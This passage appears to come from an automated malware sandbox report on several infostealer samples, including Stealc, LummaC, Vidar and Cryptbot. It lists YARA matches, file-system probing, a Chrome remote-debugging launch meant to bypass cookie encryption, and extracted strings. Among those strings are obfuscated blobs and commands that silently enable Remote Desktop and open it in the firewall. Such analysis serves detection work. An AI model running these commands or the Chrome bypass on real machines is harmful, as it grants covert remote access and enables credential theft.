                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeDirectory queried: number of queries: 1001
                                  Source: Yara matchFile source: 0000000A.00000003.2497430762.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000B.00000002.2605733267.000000000085C000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000003.2510620291.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000003.2510421518.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000003.2497003981.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000003.2497289742.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: legs.exe PID: 6408, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: stealc_valenciga.exe PID: 6128, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: gold1111111111.exe PID: 7144, type: MEMORYSTR

                                  Remote Access Functionality

                                  barindex
                                  Attempt to bypass Chrome Application-Bound Encryption
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                  Yara detected Cryptbot
                                  Source: Yara matchFile source: Process Memory Space: liddad.exe PID: 6452, type: MEMORYSTR
                                  Yara detected LummaC Stealer
                                  Source: Yara matchFile source: Process Memory Space: gold1111111111.exe PID: 7144, type: MEMORYSTR
                                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                  Source: Yara matchFile source: Process Memory Space: legs.exe PID: 6408, type: MEMORYSTR
                                  Yara detected Stealc
                                  Source: Yara matchFile source: 11.0.stealc_valenciga.exe.790000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 11.2.stealc_valenciga.exe.790000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 33.2.0d261d49cf.exe.b60000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 26.2.0d261d49cf.exe.b60000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0000000B.00000002.2606844881.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000B.00000000.2396771733.00000000007BB000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001A.00000002.2966877461.0000000000B61000.00000040.00000001.01000000.0000003E.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001A.00000002.2982325237.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000B.00000002.2605307316.00000000007BB000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000021.00000002.2973274370.0000000000B61000.00000040.00000001.01000000.0000003E.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: stealc_valenciga.exe PID: 6128, type: MEMORYSTR
                                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\stealc_valenciga[1].exe, type: DROPPED
                                  Source: Yara matchFile source: dump.pcap, type: PCAP
                                  Yara detected Vidar stealer
                                  Source: Yara matchFile source: Process Memory Space: stealc_valenciga.exe PID: 6128, type: MEMORYSTR
                                  Contains functionality to start a terminal service
                                  Source: am209.exeString found in binary or memory: net start termservice
                                  Source: am209.exe, 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: net start termservice
                                  Source: am209.exe, 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set191655f008adc880f91bfc85bc56db54c1ec479e5342a25940592acf24703eb24bee0740149a3e95dd6efb1faf26970e5e6f97CR7WFdNmCP4AOQJjRhq6BYPt8NiD0wkycT2 4V7vhIeqDQUrHu==KwQg6BZizQRn8K==BQLn8K==PkC0TNG7NTFlPt==PELh6h0nAjV71N==KYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41D8KX0n2jVxfCWahlDqg427VpPpW3ZcPO==KYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41D8KX0n2jVxfCWahlDqg427SZbreH3rPVz8PRSa2fBWcDShgArHg4ue0ZDuK1Hc7hWQ2x==KkLoO0RfCwdsxCJQTBiHNAZAQ5BaKYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41D8KX0n2jVxfCWahlDqg427VpPp3lLpTAChBwIjKFzqTXO71UM=KYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41D8KX0n2jVxfCWahlDqg427SZbreH3rPVz8OWma1DwjTj6h4ELzhy==zTLOLPOFJh9JURuuOO==NCvr7u==KCZOPu==HYLP1UG14lC130G121C1Oka1OVy13EC14UU1PEQ1OVO12FO120313hQ=O1zgTw 1Dxa0ZuehAVlgIu2O1zgTw 1Dw=O0nk7w 1Dw=PBu=PRu=PRy=PRC=JUvk6a==1FHV7xtkAt==1FHV7BRVAv8=PV8gPEnnO0Rf3FCs2VDk5kbrB1vW5Q0PFEC+FEG+BZrn8Qie1kMyAwimyu==6y==zlLp5RVYFO==308g6ABoBf5ndDt=10Lt6g0hBwIx1DuhH0LVNgKP0UZoW0ioiELuXY2gcy==KFzqTXO71RRkfDC2GTPwOVV6JZ9pfEa7hkK=GVPk7gJ=I0vu7A0n2Zt8KBu73e==HTDAPu==KEvpTAJ6JZVmfUGeiFa=HEZe8AdnxCdo0d==GTPCCxOrPAdPNTxW1TKQhkb1jS==GkbVTA0bOT5n1UF=JkZt8AdjK0Zr5AdoG0Zo6WWkL0bpLA0bOT5n1UF=CButGtVQCgc7QN==3ky=40y=G0Zp8A0j3z1XgUyaTgruiYuUbZvcfoKoPkZt6M6 NURkQvy8g1Lv4ICsfVUoOTUmBQQoFM5itOfy6W POT53NROeh1rwh4iUbY3pRjvf21zoFQW73DE KD27gUK NoObeIydRzvf1Ung6gKiOQ0lyeQFKWdj3DVxfzYJjVrmTkybdJvndXHa4Ebq6cdkN0RofzYoiFzm3YXHDiUFtOeoFM5iAP0=BQQIwa==F1De7d5mBkfrTq==G0Zp8A0j3z1XgUyaTgrihJymbYHcgHfo2gZZFRiS3v1pd0GiQVLzgISoZ43f2XK=KZbOPy0CMBN4ekGaglHEg42Udo3nX3PTNCDq6hWn1ZxfSZ6ihFL14ZGIZYVg0FHo2VrW8A0nIjFw1N==G0Zo7B0POUJR0TYaOUzeTA0bOZhscjqhgUVwhJCsd5LWgo8X5VerGNNoCAU5PwdUQTY=BVLp5QSkODUwKZbOPy0CMBN4ekGaglHEg42Udo3nX3PTNCDq6hWn1ZxfXT2eiELl0oie0Y38T13HLDzKNzCLHRRIVYt=KZbOPy0CMBNydkOng0nU4ZNqNFz8X3Pr4kbeTRS2FjFCcTKtfVDxgICZYHTk2HPoLkbfTQdyGx==NBqrGxF=HELhSR0h3CNofEOegk4AQneM0ZHqeIPT1UZpHELhSR0h3CNofEOegk4AQniM0ZHqeIPT1UZpKYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41CbNfW2F0VBejSjiDPmhpKjc4Y=KFzqTB093B5kdTR=ChqsIK==ChqtGa==ChqsHa==ChqtHK==G1Lt7g0j3BJ4cTu Ny==Ehe13lLpTAChBwIx1UeaB0ibylHc7Wyg0TxvKz6bNAZqgUxcygqhDcGP0T1od0SPNBuhOkVa0IPnLB==zgObLRme3zI=ygqhDcGnOT4jyAOhCu==KEZYTROo0DVvdz2ajEK=BULZTQSQ3DlydkykgEbkjUys0YVqgHPs1U4pTQV6ARZsdDR6Ne==ye==308W8AWk3Z4jNUJ6QVGhRC==31G47q==3kvpTAdiI0L0Sgd72jQjVDCUg1L12Hys0Yrq1XK=CBqrGxFPBQk=CBqrGxFPBgI=CBqrGxFPBgM=CBqrGxFPBZY=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                  Source: am209.exe, 00000008.00000000.2374747977.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: net start termservice
                                  Source: am209.exe, 00000008.00000000.2374747977.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set191655f008adc880f91bfc85bc56db54c1ec479e5342a25940592acf24703eb24bee0740149a3e95dd6efb1faf26970e5e6f97CR7WFdNmCP4AOQJjRhq6BYPt8NiD0wkycT2 4V7vhIeqDQUrHu==KwQg6BZizQRn8K==BQLn8K==PkC0TNG7NTFlPt==PELh6h0nAjV71N==KYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41D8KX0n2jVxfCWahlDqg427VpPpW3ZcPO==KYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41D8KX0n2jVxfCWahlDqg427SZbreH3rPVz8PRSa2fBWcDShgArHg4ue0ZDuK1Hc7hWQ2x==KkLoO0RfCwdsxCJQTBiHNAZAQ5BaKYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41D8KX0n2jVxfCWahlDqg427VpPp3lLpTAChBwIjKFzqTXO71UM=KYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41D8KX0n2jVxfCWahlDqg427SZbreH3rPVz8OWma1DwjTj6h4ELzhy==zTLOLPOFJh9JURuuOO==NCvr7u==KCZOPu==HYLP1UG14lC130G121C1Oka1OVy13EC14UU1PEQ1OVO12FO120313hQ=O1zgTw 1Dxa0ZuehAVlgIu2O1zgTw 1Dw=O0nk7w 1Dw=PBu=PRu=PRy=PRC=JUvk6a==1FHV7xtkAt==1FHV7BRVAv8=PV8gPEnnO0Rf3FCs2VDk5kbrB1vW5Q0PFEC+FEG+BZrn8Qie1kMyAwimyu==6y==zlLp5RVYFO==308g6ABoBf5ndDt=10Lt6g0hBwIx1DuhH0LVNgKP0UZoW0ioiELuXY2gcy==KFzqTXO71RRkfDC2GTPwOVV6JZ9pfEa7hkK=GVPk7gJ=I0vu7A0n2Zt8KBu73e==HTDAPu==KEvpTAJ6JZVmfUGeiFa=HEZe8AdnxCdo0d==GTPCCxOrPAdPNTxW1TKQhkb1jS==GkbVTA0bOT5n1UF=JkZt8AdjK0Zr5AdoG0Zo6WWkL0bpLA0bOT5n1UF=CButGtVQCgc7QN==3ky=40y=G0Zp8A0j3z1XgUyaTgruiYuUbZvcfoKoPkZt6M6 NURkQvy8g1Lv4ICsfVUoOTUmBQQoFM5itOfy6W POT53NROeh1rwh4iUbY3pRjvf21zoFQW73DE KD27gUK NoObeIydRzvf1Ung6gKiOQ0lyeQFKWdj3DVxfzYJjVrmTkybdJvndXHa4Ebq6cdkN0RofzYoiFzm3YXHDiUFtOeoFM5iAP0=BQQIwa==F1De7d5mBkfrTq==G0Zp8A0j3z1XgUyaTgrihJymbYHcgHfo2gZZFRiS3v1pd0GiQVLzgISoZ43f2XK=KZbOPy0CMBN4ekGaglHEg42Udo3nX3PTNCDq6hWn1ZxfSZ6ihFL14ZGIZYVg0FHo2VrW8A0nIjFw1N==G0Zo7B0POUJR0TYaOUzeTA0bOZhscjqhgUVwhJCsd5LWgo8X5VerGNNoCAU5PwdUQTY=BVLp5QSkODUwKZbOPy0CMBN4ekGaglHEg42Udo3nX3PTNCDq6hWn1ZxfXT2eiELl0oie0Y38T13HLDzKNzCLHRRIVYt=KZbOPy0CMBNydkOng0nU4ZNqNFz8X3Pr4kbeTRS2FjFCcTKtfVDxgICZYHTk2HPoLkbfTQdyGx==NBqrGxF=HELhSR0h3CNofEOegk4AQneM0ZHqeIPT1UZpHELhSR0h3CNofEOegk4AQniM0ZHqeIPT1UZpKYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41CbNfW2F0VBejSjiDPmhpKjc4Y=KFzqTB093B5kdTR=ChqsIK==ChqtGa==ChqsHa==ChqtHK==G1Lt7g0j3BJ4cTu Ny==Ehe13lLpTAChBwIx1UeaB0ibylHc7Wyg0TxvKz6bNAZqgUxcygqhDcGP0T1od0SPNBuhOkVa0IPnLB==zgObLRme3zI=ygqhDcGnOT4jyAOhCu==KEZYTROo0DVvdz2ajEK=BULZTQSQ3DlydkykgEbkjUys0YVqgHPs1U4pTQV6ARZsdDR6Ne==ye==308W8AWk3Z4jNUJ6QVGhRC==31G47q==3kvpTAdiI0L0Sgd72jQjVDCUg1L12Hys0Yrq1XK=CBqrGxFPBQk=CBqrGxFPBgI=CBqrGxFPBgM=CBqrGxFPBZY=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                  Source: defnur.exeString found in binary or memory: net start termservice
                                  Source: defnur.exe, 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: net start termservice
                                  Source: defnur.exe, 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set191655f008adc880f91bfc85bc56db54c1ec479e5342a25940592acf24703eb24bee0740149a3e95dd6efb1faf26970e5e6f97CR7WFdNmCP4AOQJjRhq6BYPt8NiD0wkycT2 4V7vhIeqDQUrHu==KwQg6BZizQRn8K==BQLn8K==PkC0TNG7NTFlPt==PELh6h0nAjV71N==KYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41D8KX0n2jVxfCWahlDqg427VpPpW3ZcPO==KYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41D8KX0n2jVxfCWahlDqg427SZbreH3rPVz8PRSa2fBWcDShgArHg4ue0ZDuK1Hc7hWQ2x==KkLoO0RfCwdsxCJQTBiHNAZAQ5BaKYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41D8KX0n2jVxfCWahlDqg427VpPp3lLpTAChBwIjKFzqTXO71UM=KYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41D8KX0n2jVxfCWahlDqg427SZbreH3rPVz8OWma1DwjTj6h4ELzhy==zTLOLPOFJh9JURuuOO==NCvr7u==KCZOPu==HYLP1UG14lC130G121C1Oka1OVy13EC14UU1PEQ1OVO12FO120313hQ=O1zgTw 1Dxa0ZuehAVlgIu2O1zgTw 1Dw=O0nk7w 1Dw=PBu=PRu=PRy=PRC=JUvk6a==1FHV7xtkAt==1FHV7BRVAv8=PV8gPEnnO0Rf3FCs2VDk5kbrB1vW5Q0PFEC+FEG+BZrn8Qie1kMyAwimyu==6y==zlLp5RVYFO==308g6ABoBf5ndDt=10Lt6g0hBwIx1DuhH0LVNgKP0UZoW0ioiELuXY2gcy==KFzqTXO71RRkfDC2GTPwOVV6JZ9pfEa7hkK=GVPk7gJ=I0vu7A0n2Zt8KBu73e==HTDAPu==KEvpTAJ6JZVmfUGeiFa=HEZe8AdnxCdo0d==GTPCCxOrPAdPNTxW1TKQhkb1jS==GkbVTA0bOT5n1UF=JkZt8AdjK0Zr5AdoG0Zo6WWkL0bpLA0bOT5n1UF=CButGtVQCgc7QN==3ky=40y=G0Zp8A0j3z1XgUyaTgruiYuUbZvcfoKoPkZt6M6 NURkQvy8g1Lv4ICsfVUoOTUmBQQoFM5itOfy6W POT53NROeh1rwh4iUbY3pRjvf21zoFQW73DE KD27gUK NoObeIydRzvf1Ung6gKiOQ0lyeQFKWdj3DVxfzYJjVrmTkybdJvndXHa4Ebq6cdkN0RofzYoiFzm3YXHDiUFtOeoFM5iAP0=BQQIwa==F1De7d5mBkfrTq==G0Zp8A0j3z1XgUyaTgrihJymbYHcgHfo2gZZFRiS3v1pd0GiQVLzgISoZ43f2XK=KZbOPy0CMBN4ekGaglHEg42Udo3nX3PTNCDq6hWn1ZxfSZ6ihFL14ZGIZYVg0FHo2VrW8A0nIjFw1N==G0Zo7B0POUJR0TYaOUzeTA0bOZhscjqhgUVwhJCsd5LWgo8X5VerGNNoCAU5PwdUQTY=BVLp5QSkODUwKZbOPy0CMBN4ekGaglHEg42Udo3nX3PTNCDq6hWn1ZxfXT2eiELl0oie0Y38T13HLDzKNzCLHRRIVYt=KZbOPy0CMBNydkOng0nU4ZNqNFz8X3Pr4kbeTRS2FjFCcTKtfVDxgICZYHTk2HPoLkbfTQdyGx==NBqrGxF=HELhSR0h3CNofEOegk4AQneM0ZHqeIPT1UZpHELhSR0h3CNofEOegk4AQniM0ZHqeIPT1UZpKYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41CbNfW2F0VBejSjiDPmhpKjc4Y=KFzqTB093B5kdTR=ChqsIK==ChqtGa==ChqsHa==ChqtHK==G1Lt7g0j3BJ4cTu Ny==Ehe13lLpTAChBwIx1UeaB0ibylHc7Wyg0TxvKz6bNAZqgUxcygqhDcGP0T1od0SPNBuhOkVa0IPnLB==zgObLRme3zI=ygqhDcGnOT4jyAOhCu==KEZYTROo0DVvdz2ajEK=BULZTQSQ3DlydkykgEbkjUys0YVqgHPs1U4pTQV6ARZsdDR6Ne==ye==308W8AWk3Z4jNUJ6QVGhRC==31G47q==3kvpTAdiI0L0Sgd72jQjVDCUg1L12Hys0Yrq1XK=CBqrGxFPBQk=CBqrGxFPBgI=CBqrGxFPBgM=CBqrGxFPBZY=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                  Source: defnur.exe, 00000009.00000000.2386721395.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: net start termservice
                                  Source: defnur.exe, 00000009.00000000.2386721395.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set191655f008adc880f91bfc85bc56db54c1ec479e5342a25940592acf24703eb24bee0740149a3e95dd6efb1faf26970e5e6f97CR7WFdNmCP4AOQJjRhq6BYPt8NiD0wkycT2 4V7vhIeqDQUrHu==KwQg6BZizQRn8K==BQLn8K==PkC0TNG7NTFlPt==PELh6h0nAjV71N==KYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41D8KX0n2jVxfCWahlDqg427VpPpW3ZcPO==KYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41D8KX0n2jVxfCWahlDqg427SZbreH3rPVz8PRSa2fBWcDShgArHg4ue0ZDuK1Hc7hWQ2x==KkLoO0RfCwdsxCJQTBiHNAZAQ5BaKYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41D8KX0n2jVxfCWahlDqg427VpPp3lLpTAChBwIjKFzqTXO71UM=KYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41D8KX0n2jVxfCWahlDqg427SZbreH3rPVz8OWma1DwjTj6h4ELzhy==zTLOLPOFJh9JURuuOO==NCvr7u==KCZOPu==HYLP1UG14lC130G121C1Oka1OVy13EC14UU1PEQ1OVO12FO120313hQ=O1zgTw 1Dxa0ZuehAVlgIu2O1zgTw 1Dw=O0nk7w 1Dw=PBu=PRu=PRy=PRC=JUvk6a==1FHV7xtkAt==1FHV7BRVAv8=PV8gPEnnO0Rf3FCs2VDk5kbrB1vW5Q0PFEC+FEG+BZrn8Qie1kMyAwimyu==6y==zlLp5RVYFO==308g6ABoBf5ndDt=10Lt6g0hBwIx1DuhH0LVNgKP0UZoW0ioiELuXY2gcy==KFzqTXO71RRkfDC2GTPwOVV6JZ9pfEa7hkK=GVPk7gJ=I0vu7A0n2Zt8KBu73e==HTDAPu==KEvpTAJ6JZVmfUGeiFa=HEZe8AdnxCdo0d==GTPCCxOrPAdPNTxW1TKQhkb1jS==GkbVTA0bOT5n1UF=JkZt8AdjK0Zr5AdoG0Zo6WWkL0bpLA0bOT5n1UF=CButGtVQCgc7QN==3ky=40y=G0Zp8A0j3z1XgUyaTgruiYuUbZvcfoKoPkZt6M6 NURkQvy8g1Lv4ICsfVUoOTUmBQQoFM5itOfy6W POT53NROeh1rwh4iUbY3pRjvf21zoFQW73DE KD27gUK NoObeIydRzvf1Ung6gKiOQ0lyeQFKWdj3DVxfzYJjVrmTkybdJvndXHa4Ebq6cdkN0RofzYoiFzm3YXHDiUFtOeoFM5iAP0=BQQIwa==F1De7d5mBkfrTq==G0Zp8A0j3z1XgUyaTgrihJymbYHcgHfo2gZZFRiS3v1pd0GiQVLzgISoZ43f2XK=KZbOPy0CMBN4ekGaglHEg42Udo3nX3PTNCDq6hWn1ZxfSZ6ihFL14ZGIZYVg0FHo2VrW8A0nIjFw1N==G0Zo7B0POUJR0TYaOUzeTA0bOZhscjqhgUVwhJCsd5LWgo8X5VerGNNoCAU5PwdUQTY=BVLp5QSkODUwKZbOPy0CMBN4ekGaglHEg42Udo3nX3PTNCDq6hWn1ZxfXT2eiELl0oie0Y38T13HLDzKNzCLHRRIVYt=KZbOPy0CMBNydkOng0nU4ZNqNFz8X3Pr4kbeTRS2FjFCcTKtfVDxgICZYHTk2HPoLkbfTQdyGx==NBqrGxF=HELhSR0h3CNofEOegk4AQneM0ZHqeIPT1UZpHELhSR0h3CNofEOegk4AQniM0ZHqeIPT1UZpKYZBPziqJhVfVTi9hkZAg4WUYH8kenLo41CbNfW2F0VBejSjiDPmhpKjc4Y=KFzqTB093B5kdTR=ChqsIK==ChqtGa==ChqsHa==ChqtHK==G1Lt7g0j3BJ4cTu Ny==Ehe13lLpTAChBwIx1UeaB0ibylHc7Wyg0TxvKz6bNAZqgUxcygqhDcGP0T1od0SPNBuhOkVa0IPnLB==zgObLRme3zI=ygqhDcGnOT4jyAOhCu==KEZYTROo0DVvdz2ajEK=BULZTQSQ3DlydkykgEbkjUys0YVqgHPs1U4pTQV6ARZsdDR6Ne==ye==308W8AWk3Z4jNUJ6QVGhRC==31G47q==3kvpTAdiI0L0Sgd72jQjVDCUg1L12Hys0Yrq1XK=CBqrGxFPBQk=CBqrGxFPBgI=CBqrGxFPBgM=CBqrGxFPBZY=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0069EB78 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,5_2_0069EB78
